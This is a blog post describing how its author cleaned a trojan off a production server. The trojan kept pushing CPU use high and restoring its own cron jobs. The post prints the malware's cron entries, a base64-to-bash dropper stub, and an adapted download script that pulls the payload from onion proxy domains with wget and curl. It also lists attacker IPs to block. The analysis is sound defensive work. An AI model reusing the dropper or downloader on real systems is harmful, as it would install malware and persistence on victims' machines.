一个木马

生产环境的CPU飚高，发现可疑进程
在这里插入图片描述
一执行就删除了

kill -9 强杀，crond -l 检查发现异常，先清理定时任务
0 * * * * ~/.systemd-login

查IP：http://www.cip.cc
在这里插入图片描述

~/.systemd-login内容分析

#!/bin/bash
exec &>/dev/null
sleep 7
{echo,ZXhlYyA................ZmkK}|{base64,-d}|bash

base64解密脚本中的echo字符串：http://tool.oschina.net/encrypt?type=3
在这里插入图片描述
封杀脚本下载站点：rapid7xxx.xxx
封杀IP：101.64.182.145

CPU过一段时间又飚高
又发现一个隐藏的定时任务
/etc/cron.d/systemd : 0 * * * * root /lib/systemd/systemd-login
再删掉
观察一段时间
CPU再次飚高，定时任务又被恢复。。。

手动下载定时任务脚本进行分析
在这里插入图片描述
解密

通过文件/tmp/.X1M-unix 找到守护进程gf128mul，负责检查木马存活、定时任务、木马文件下载
继续杀

修改脚本，手动执行下载木马

#!/bin/sh
x() {
x=/systemd-login
z=./Trojan_$(cat /dev/urandom | tr -cd [:alnum:]|head -c 6)
 wget -t1 -T180 -U- --no-check-certificate $1$x -O$z || curl -m180 -fLkA- $1$x -o$z
## chmod +x $z;$z;rm -f $z
}
for h in tor2web.io d2web.org tor2web.su onion.to onion.mn onion.glass onion.in.net onion.sh
do
if ! ps -p $(</tmp/.X1M-unix); then
echo "downloading..."
x aptgetgxqs3secda.$h
echo $z
else
break
fi
done

封杀以下IP：

38.229.33.40
173.255.218.140
149.56.101.79
185.100.85.150
46.105.146.232
139.162.228.156
185.178.208.150
37.228.129.102

反编译木马分析代码：

下载守护进程gf128mul，反编译：

posted @ 2019-08-19 11:45 M1927 阅读(42) 评论(0) 编辑收藏举报

刷新页面返回顶部

NO.27149

可以俗，不要庸

一个木马

公告